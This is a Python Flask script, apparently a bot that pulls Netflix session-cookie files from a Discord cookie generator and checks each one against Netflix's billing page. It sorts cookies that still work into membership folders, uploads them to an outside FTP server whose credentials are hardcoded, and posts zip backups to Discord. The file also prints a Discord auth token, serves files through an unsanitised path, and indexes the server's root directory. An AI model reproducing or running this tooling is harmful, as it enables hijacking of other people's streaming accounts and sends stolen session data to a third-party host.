| import re |
| import requests |
| from bs4 import BeautifulSoup |
| from deep_translator import GoogleTranslator |
| import glob |
| import os |
| import shutil |
| import string |
| import random |
| from flask import Flask, abort, send_file, render_template |
| from flask_autoindex import AutoIndex |
| from threading import Thread |
| import time |
| import json |
| from urllib.parse import unquote |
| from ftplib import FTP_TLS |
| os.remove("./cookies/test.txt") |
|
|
| class Unbuffered(object): |
| def __init__(self, stream): |
| self.stream = stream |
| def write(self, data): |
| self.stream.write(data) |
| self.stream.flush() |
| def writelines(self, datas): |
| self.stream.writelines(datas) |
| self.stream.flush() |
| def __getattr__(self, attr): |
| return getattr(self.stream, attr) |
| import sys |
| sys.stdout = Unbuffered(sys.stdout) |
|
|
|
|
| def send_retrieve_cookie_msg(channelid): |
| print("getting cookie") |
| secret = os.environ['DISCORD_CODE'] |
| print(secret) |
| data = {"content": "c.gen netflix"} |
| headers = {"authorization": secret} |
| r = requests.post( |
| "https://discord.com/api/v9/channels/1186365728278990938/messages", |
| data=data, |
| headers=headers) |
| time.sleep(10) |
| os.chdir("./cookies/") |
| if r.status_code != 429: |
| headers = {'authorization': secret} |
| r = requests.get( |
| f' https://discord.com/api/v9/channels/{channelid}/messages?limit=1', |
| headers=headers) |
| jsonn = json.loads(r.text) |
| |
|
|
| for value in jsonn: |
| |
| S = 6 |
| ran = ''.join(random.choices(string.ascii_uppercase + string.digits, |
| k=S)) |
| |
| try: |
| attachmentUrl = value['attachments'][0]['url'] |
| filename = str(ran) + ".txt" |
| response = requests.get(attachmentUrl) |
| open("old" + filename, "wb").write(response.content) |
| s = 1 |
| with open("old" + filename, 'r') as r, open(filename, 'w') as o: |
| for line in r: |
| |
| if line.strip(): |
| if (s == 1): |
| o.write("# Netscape HTTP Cookie File\n") |
| s = 2 |
| o.write(line) |
| os.remove("old" + filename) |
| except Exception as e: |
|
|
| print(e) |
| pass |
| else: |
| print("cooldown") |
|
|
| os.chdir("../") |
|
|
|
|
| def parseCookieFile(cookiefile): |
| x = "" |
| """Parse a cookies.txt file and return a dictionary of key value pairs |
| compatible with requests.""" |
|
|
| cookies = {} |
| with open(cookiefile, 'r') as fp: |
| for line in fp: |
| if not re.match(r'^\#', line): |
| lineFields = line.strip().split('\t') |
| try: |
| cookies[lineFields[5]] = lineFields[6] |
|
|
| except: |
| print("Invalid cookie") |
| pass |
| if x == "fail": |
| return "fail" |
| else: |
| return cookies |
|
|
|
|
| def getNetflixInfo(cookiefile): |
| cookies = parseCookieFile(cookiefile) |
| |
| if cookies != "fail": |
|
|
| r = requests.get("https://www.netflix.com/BillingActivity", |
| cookies=cookies) |
| print(r.url) |
| if "login" in r.url: |
| print("Login Page") |
| os.remove(cookiefile) |
| else: |
| soup = BeautifulSoup(r.content, "html.parser") |
| try: |
| print(r.url) |
| billingDate = soup.find("div", { |
| "data-uia": "streaming-next-cycle" |
| }) |
| print(billingDate) |
| billingDate = billingDate.get_text() |
| planName = soup.find("div", {"data-uia": "plan-name"}) |
| print(planName) |
| planName = planName.get_text() |
| billingDate = GoogleTranslator(source='auto', |
| target='en').translate(billingDate) |
| try: |
| lang = soup.find("html", {"lang": 'en'}).get_text() |
| lang = "English" |
| except: |
| lang = "" |
| pass |
| planName = GoogleTranslator(source='auto', |
| target='en').translate(planName) |
|
|
| print(billingDate + " " + planName + " " + lang) |
| S = 3 |
| ran = ''.join( |
| random.choices(string.ascii_uppercase + string.digits, k=S)) |
| newCookiefile = "../Membership/" + billingDate + " " + planName + " " + lang + " (" + str(ran) + ").txt" |
| shutil.move( |
| cookiefile, newCookiefile) |
| session = ftplib.FTP('hashir672.serv00.net','f6857_hashir_serv00','Hashirisbest@1122') |
|
|
| file = open(newCookiefile,'rb') |
| session.storbinary('STOR ./public_html/Membership/'+newCookiefile, file) |
| file.close() |
| session.quit() |
| os.remove(newCookiefile) |
| |
|
|
| except Exception as e: |
| print(e) |
| f = open("../Membership/error.txt", "a") |
| f.write(str(e) + "\n\n") |
| f.close() |
| print("\n Moving in noMember") |
| S = 10 |
| ran = ''.join( |
| random.choices(string.ascii_uppercase + string.digits, k=S)) |
| shutil.move(cookiefile, '../NoMembership/NoMember' + str(ran) + ".txt") |
| else: |
| os.remove(cookiefile) |
| print("cookie removed") |
|
|
|
|
| def mainTask(): |
| print("running cookie retriever") |
| send_retrieve_cookie_msg(1191381755731644418) |
| time.sleep(5) |
| print("running netflix checker") |
| os.chdir('./cookies/') |
| for fileName in glob.glob("*.txt"): |
| print(fileName) |
| getNetflixInfo(fileName) |
| os.chdir('../') |
|
|
| def testTask(): |
| os.chdir('./cookietest/') |
| getNetflixInfo("./cookie.txt") |
| os.chdir("../") |
|
|
| def connect(): |
| ftp = FTP_TLS() |
| ftp.debugging = 2 |
| ftp.connect('hashir672.serv00.net') |
| ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122') |
| return ftp |
|
|
|
|
| def backupTask(location,filename): |
| for file in glob.glob("./Membership/*.txt"): |
| os.remove(file) |
| print('1') |
| session = connect() |
| print("1") |
| session.voidcmd("NOOP") |
| session.cwd('./public_html/Membership') |
| files = session.nlst() |
| files.remove(".") |
| files.remove("..") |
| for file in files: |
| |
| r = requests.get("https://hashir672.serv00.net/Membership/"+file) |
| open("./Membership/"+file,"wb").write(r.content) |
| session.quit() |
|
|
| archived = shutil.make_archive('./'+filename, 'zip', location) |
| header = { |
| 'authorization': os.environ['DISCORD_CODE'], |
| } |
| files = { |
| "file" : ("./"+filename+".zip", open("./"+filename+".zip", 'rb')) |
| } |
|
|
| channel_id = "1193267345079156746" |
|
|
| r = requests.post(f"https://discord.com/api/v9/channels/{channel_id}/messages", headers=header, files=files) |
|
|
| app = Flask(__name__) |
|
|
|
|
| @app.route('/', defaults={'req_path': ''}) |
| @app.route('/<path:req_path>') |
| def dir_listing(req_path): |
| BASE_DIR = './Membership' |
| |
| abs_path = os.path.join(BASE_DIR, req_path) |
| abs_path = unquote(abs_path) |
| |
|
|
| |
| if os.path.isfile(abs_path): |
| return send_file(abs_path) |
|
|
| |
| if not os.path.exists(abs_path): |
| return str(abs_path) |
| |
| |
| |
| files = os.listdir(abs_path) |
| return render_template('files.html', files=files) |
|
|
|
|
| @app.route('/alive') |
| def alive(): |
| return "Keep Alive" |
|
|
|
|
| @app.route('/main') |
| def main(): |
| |
| thr = Thread(target=mainTask) |
| thr.start() |
| |
| return 'Hello from Flask!' |
| @app.route('/test') |
| def test(): |
| thr = Thread(target=testTask) |
| |
| thr.start() |
| |
| return 'Hello from Flask! test' |
|
|
| @app.route('/backup') |
| def backup(): |
| thr = Thread(target=backupTask,args=("./Membership","backup",)) |
| |
| print("backup Start") |
| thr.start() |
| |
| return 'Backup Started of Memberhship' |
|
|
| @app.route('/backupNoMembership') |
| def backupNoMembership(): |
| thr = Thread(target=backupTask,args=("./NoMembership","backupNoMembership",)) |
| |
| thr.start() |
| |
| return 'Backup Started of NoMemberhship' |
|
|
|
|
| ppath = "/" |
|
|
| AutoIndex(app, browse_root=ppath) |
| |
|
|
|
|